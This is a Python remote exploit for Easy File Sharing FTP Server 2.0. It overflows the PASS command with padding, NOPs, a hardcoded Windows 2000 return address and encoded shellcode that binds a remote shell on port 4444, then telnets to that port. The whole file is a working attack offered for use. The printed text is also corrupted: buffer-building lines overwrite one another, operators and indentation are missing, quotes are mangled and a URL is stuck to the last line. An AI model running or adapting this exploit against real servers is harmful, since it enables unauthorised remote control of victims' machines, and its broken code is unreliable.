#!/usr/bin/python
# Remote exploit for Easy File Sharing FTP server V2.0. The vulnerability
# was discovered by h07 and a POC for windows XP SP2 (polish version) was
# provided. This exploit was tested on windows 2000 server SP4. The exploit
# binds a shell on TCP port 4444.
#
# Author shall bear no responsibility for any screw ups
# Winny Thomas 🙂
import os
import sys
import time
import struct
import socket
shellcode = "\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49"
shellcode = "\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36"
shellcode = "\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34"
shellcode = "\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41"
shellcode = "\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4c\\x56\\x4b\\x4e"
shellcode = "\\x4d\\x54\\x4a\\x4e\\x49\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x42\\x46\\x4b\\x48"
shellcode = "\\x4e\\x56\\x46\\x42\\x46\\x42\\x4b\\x48\\x45\\x34\\x4e\\x33\\x4b\\x38\\x4e\\x37"
shellcode = "\\x45\\x50\\x4a\\x57\\x41\\x30\\x4f\\x4e\\x4b\\x38\\x4f\\x54\\x4a\\x31\\x4b\\x38"
shellcode = "\\x4f\\x45\\x42\\x32\\x41\\x30\\x4b\\x4e\\x49\\x34\\x4b\\x38\\x46\\x33\\x4b\\x38"
shellcode = "\\x41\\x30\\x50\\x4e\\x41\\x33\\x42\\x4c\\x49\\x59\\x4e\\x4a\\x46\\x58\\x42\\x4c"
shellcode = "\\x46\\x57\\x47\\x50\\x41\\x4c\\x4c\\x4c\\x4d\\x30\\x41\\x50\\x44\\x4c\\x4b\\x4e"
shellcode = "\\x46\\x4f\\x4b\\x43\\x46\\x35\\x46\\x32\\x4a\\x52\\x45\\x47\\x45\\x4e\\x4b\\x58"
shellcode = "\\x4f\\x45\\x46\\x42\\x41\\x50\\x4b\\x4e\\x48\\x56\\x4b\\x58\\x4e\\x30\\x4b\\x34"
shellcode = "\\x4b\\x38\\x4f\\x45\\x4e\\x51\\x41\\x50\\x4b\\x4e\\x43\\x30\\x4e\\x42\\x4b\\x48"
shellcode = "\\x49\\x38\\x4e\\x46\\x46\\x52\\x4e\\x31\\x41\\x36\\x43\\x4c\\x41\\x43\\x4b\\x4d"
shellcode = "\\x46\\x36\\x4b\\x48\\x43\\x34\\x42\\x53\\x4b\\x48\\x42\\x44\\x4e\\x50\\x4b\\x58"
shellcode = "\\x42\\x47\\x4e\\x31\\x4d\\x4a\\x4b\\x48\\x42\\x54\\x4a\\x30\\x50\\x55\\x4a\\x56"
shellcode = "\\x50\\x38\\x50\\x44\\x50\\x30\\x4e\\x4e\\x42\\x55\\x4f\\x4f\\x48\\x4d\\x48\\x36"
shellcode = "\\x43\\x35\\x48\\x36\\x4a\\x36\\x43\\x43\\x44\\x43\\x4a\\x36\\x47\\x37\\x43\\x57"
shellcode = "\\x44\\x53\\x4f\\x35\\x46\\x45\\x4f\\x4f\\x42\\x4d\\x4a\\x46\\x4b\\x4c\\x4d\\x4e"
shellcode = "\\x4e\\x4f\\x4b\\x43\\x42\\x45\\x4f\\x4f\\x48\\x4d\\x4f\\x45\\x49\\x48\\x45\\x4e"
shellcode = "\\x48\\x56\\x41\\x48\\x4d\\x4e\\x4a\\x30\\x44\\x30\\x45\\x55\\x4c\\x56\\x44\\x30"
shellcode = "\\x4f\\x4f\\x42\\x4d\\x4a\\x56\\x49\\x4d\\x49\\x50\\x45\\x4f\\x4d\\x4a\\x47\\x55"
shellcode = "\\x4f\\x4f\\x48\\x4d\\x43\\x45\\x43\\x45\\x43\\x45\\x43\\x35\\x43\\x35\\x43\\x44"
shellcode = "\\x43\\x55\\x43\\x44\\x43\\x35\\x4f\\x4f\\x42\\x4d\\x48\\x46\\x4a\\x56\\x41\\x31"
shellcode = "\\x4e\\x45\\x48\\x36\\x43\\x55\\x49\\x58\\x41\\x4e\\x45\\x39\\x4a\\x56\\x46\\x4a"
shellcode = "\\x4c\\x51\\x42\\x47\\x47\\x4c\\x47\\x45\\x4f\\x4f\\x48\\x4d\\x4c\\x46\\x42\\x31"
shellcode = "\\x41\\x35\\x45\\x55\\x4f\\x4f\\x42\\x4d\\x4a\\x36\\x46\\x4a\\x4d\\x4a\\x50\\x42"
shellcode = "\\x49\\x4e\\x47\\x45\\x4f\\x4f\\x48\\x4d\\x43\\x45\\x45\\x35\\x4f\\x4f\\x42\\x4d"
shellcode = "\\x4a\\x46\\x45\\x4e\\x49\\x44\\x48\\x58\\x49\\x54\\x47\\x45\\x4f\\x4f\\x48\\x4d"
shellcode = "\\x42\\x35\\x46\\x45\\x46\\x55\\x45\\x45\\x4f\\x4f\\x42\\x4d\\x43\\x59\\x4a\\x56"
shellcode = "\\x47\\x4e\\x49\\x37\\x48\\x4c\\x49\\x37\\x47\\x45\\x4f\\x4f\\x48\\x4d\\x45\\x55"
shellcode = "\\x4f\\x4f\\x42\\x4d\\x48\\x56\\x4c\\x46\\x46\\x46\\x48\\x46\\x4a\\x36\\x43\\x46"
shellcode = "\\x4d\\x46\\x49\\x58\\x45\\x4e\\x4c\\x46\\x42\\x35\\x49\\x35\\x49\\x32\\x4e\\x4c"
shellcode = "\\x49\\x38\\x47\\x4e\\x4c\\x36\\x46\\x34\\x49\\x38\\x44\\x4e\\x41\\x53\\x42\\x4c"
shellcode = "\\x43\\x4f\\x4c\\x4a\\x50\\x4f\\x44\\x44\\x4d\\x52\\x50\\x4f\\x44\\x44\\x4e\\x32"
shellcode = "\\x43\\x59\\x4d\\x38\\x4c\\x57\\x4a\\x33\\x4b\\x4a\\x4b\\x4a\\x4b\\x4a\\x4a\\x46"
shellcode = "\\x44\\x57\\x50\\x4f\\x43\\x4b\\x48\\x51\\x4f\\x4f\\x45\\x47\\x46\\x34\\x4f\\x4f"
shellcode = "\\x48\\x4d\\x4b\\x35\\x47\\x45\\x44\\x55\\x41\\x45\\x41\\x45\\x41\\x55\\x4c\\x36"
shellcode = "\\x41\\x30\\x41\\x35\\x41\\x45\\x45\\x45\\x41\\x45\\x4f\\x4f\\x42\\x4d\\x4a\\x46"
shellcode = "\\x4d\\x4a\\x49\\x4d\\x45\\x30\\x50\\x4c\\x43\\x55\\x4f\\x4f\\x48\\x4d\\x4c\\x46"
shellcode = "\\x4f\\x4f\\x4f\\x4f\\x47\\x43\\x4f\\x4f\\x42\\x4d\\x4b\\x48\\x47\\x55\\x4e\\x4f"
shellcode = "\\x43\\x58\\x46\\x4c\\x46\\x56\\x4f\\x4f\\x48\\x4d\\x44\\x45\\x4f\\x4f\\x42\\x4d"
shellcode = "\\x4a\\x56\\x4f\\x4e\\x50\\x4c\\x42\\x4e\\x42\\x36\\x43\\x55\\x4f\\x4f\\x48\\x4d"
shellcode = "\\x4f\\x4f\\x42\\x4d\\x5a"
def ConnectRemoteShell(target):
connect = "/usr/bin/telnet " target " 4444"
os.system(connect)
def ExploitFTP(target):
sockAddr = (target, 21)
tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tsock.connect(sockAddr)
response = tsock.recv(1024)
print response
# At the time of overflow EBX points into our shellcode
payload = \’A\’ * 2553
# NOP\’s pad with a 15 byte jump over some junk and the RET address
# Jumps into our shellcode
payload = \’\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xeb\\x0f\’
# Address of \’call ebx\’ from kernel32.dll SP4
payload = struct.pack(\'<L\’, 0x7C577B03)
# Address of pop reg/pop reg/ret for XP SP2 from ws2_32.dll
# But this one is not very reliable like Win2K SP4
#payload = struct.pack(\'<L\’, 0x71AB1269)
payload = \’\\x90\’ * 83
payload = shellcode
user = \’USER anonymous\\r\\n\’
tsock.send(user)
response = tsock.recv(1024)
print response
passwd = \’PASS \\x2c\’ payload \’\\r\\n\’
tsock.send(passwd)
response = tsock.recv(1024)
print response
if __name__ == \’__main__\’:
try:
target = sys.argv[1]
except IndexError:
print \’Usage: %s <target>\’ % sys.argv[0]
sys.exit(-1)
ExploitFTP(target)//http://www.leftworld.net
